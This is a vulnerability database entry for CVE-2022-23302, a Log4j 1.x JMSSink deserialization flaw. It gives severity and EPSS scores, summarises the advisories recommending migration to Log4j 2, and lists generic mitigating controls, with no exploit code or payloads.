CVE-2022-23302
Published: 18 January 2022
Summary
CVE-2022-23302 is a high-severity Deserialization of Untrusted Data (CWE-502) vulnerability in Oracle Business Intelligence. Its CVSS base score is 8.8 (High).
Operationally, ranked in the top 25.8% of CVEs by exploit likelihood; it is not currently listed in the CISA KEV catalog.
Deeper analysis
JMSSink in all versions of Log4j 1.x is vulnerable to deserialization of untrusted data when the attacker has write access to the Log4j configuration or when the configuration references an LDAP service under attacker control. The flaw allows an attacker to supply a TopicConnectionFactoryBindingName value that triggers JNDI lookups, resulting in remote code execution in the same manner as CVE-2021-4104. The issue affects only Log4j 1.x deployments that explicitly enable JMSSink, which is not the default configuration; Apache Log4j 1.2 reached end of life in August 2015.
An attacker with the ability to modify the logging configuration or to influence an LDAP server referenced by that configuration can achieve arbitrary code execution on the affected application host. The vulnerability carries a CVSS 3.1 score of 8.8, reflecting network-accessible exploitation with low attack complexity and high impact on confidentiality, integrity, and availability.
Advisories from Apache, NetApp, and Oracle state that users should migrate to Log4j 2, which resolves this and numerous other issues present in the 1.x series. The project documentation explicitly notes that Log4j 1.2 is no longer maintained.
EPSS for the CVE rose from a low baseline to a peak of 0.0763 on 2025-01-22 before receding to the current value of 0.0078, indicating a measurable increase in observed exploitation interest after public disclosure.
EU & UK References
- 🇪🇺 ENISA EUVD: EUVD-2022-0721
Vulnerability details
JMSSink in all versions of Log4j 1.x is vulnerable to deserialization of untrusted data when the attacker has write access to the Log4j configuration or if the configuration references an LDAP service the attacker has access to. The attacker can…
more
provide a TopicConnectionFactoryBindingName configuration causing JMSSink to perform JNDI requests that result in remote code execution in a similar fashion to CVE-2021-4104. Note this issue only affects Log4j 1.x when specifically configured to use JMSSink, which is not the default. Apache Log4j 1.2 reached end of life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the previous versions.
- CWE(s)
Related Threats
No named actor attribution yet. ATT&CK technique mapping in progress for this CVE.
Affected Assets
Mitigating Controls
Likely Mitigating Controls AI
Per-CVE control mapping for this CVE has not run yet; the list below is derived from the weakness types (CWEs) cited in the NVD entry.
Penetration testing supplies malicious serialized objects, detecting unsafe deserialization and supporting corrective actions.
Evaluation of untrusted data handling (deserialization testing) reveals unsafe processing, which the required remediation process addresses.
Untrusted serialized data can be deserialized and observed inside the chamber, blocking gadget-chain exploitation outside the sandbox.
Validates or rejects untrusted serialized data before deserialization occurs.
Identifies and blocks malicious code introduced through deserialization of untrusted data at system boundaries.
Integrity verification of serialized information can detect tampering before deserialization occurs.
Provenance of associated data allows detection of untrusted sources before deserialization or processing occurs.